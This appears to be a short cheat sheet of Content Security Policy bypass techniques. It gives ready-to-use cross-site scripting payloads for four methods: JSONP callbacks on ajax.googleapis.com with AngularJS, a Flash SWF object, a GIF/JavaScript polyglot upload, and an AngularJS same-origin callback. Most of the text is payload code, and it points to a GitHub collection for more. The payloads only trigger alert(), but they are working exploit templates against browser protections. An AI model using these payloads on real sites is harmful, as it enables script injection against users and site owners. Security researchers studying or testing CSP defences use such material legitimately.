- CSP can be implemented via:
  - Response header
  - Meta tag, e.g.
    <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
Bypass CSP via:
- ajax.googleapis.com
- Flash file
- Polyglot file
- AngularJS
Bypass CSP via ajax.googleapis.com
Check `Content-Security-Policy: script-src 'self' ajax.googleapis.com`
- here `script-src 'self' ajax.googleapis.com` means that only same-origin scripts and scripts served from ajax.googleapis.com are allowed to run
<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angular/1.6.6/angular.min.js"></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>
Bypass CSP via Flash File
Works if the CSP is `Content-Security-Policy: script-src 'self'`; when `script-src` is the only restriction, it can be bypassed with a Flash file, because plugin content is not covered by `script-src`.
<object type='application/x-shockwave-flash' data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\%22})))}catch(e) {alert(/XSS/)}//'><param name='AllowScriptAccess' Value='always'></object>
Bypassing CSP via GIF file
Works if the CSP is `Content-Security-Policy: default-src 'self'`, which means every resource must be loaded from the same origin as the host.
- Upload a GIF to the target if it has a file upload feature
- The GIF file should contain JavaScript; the GIF89a magic header doubles as a variable name so the file parses as both:
- GIF89a= 'some GIF data'; alert(document.domain);/*
<script src=GIF_FILE_PATH> </script>
Bypassing CSP via AngularJS
Works if the CSP is `Content-Security-Policy: default-src 'self'; img-src images.local`, which means everything must come from the same origin and images are accepted only from images.local (a kind of sandbox domain).
This works only if the required libraries are hosted on the target itself (images.local in this case).
# AngularJS + callback
<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="angular-1.6.6.min.js"></script> <script async src='/rfd/api/shop/product/id/1?format=json&callback=p.click'></script>
# Angular
<script src="angular-1.6.6.min.js"></script><div ng-app ng-csp id=p ng-mouseover=$event.view.alert("XSS")><br/>(Move your mouse over this element)<br/></div>
More at https://github.com/bhaveshk90/Content-Security-Policy-CSP-Bypass-Techniques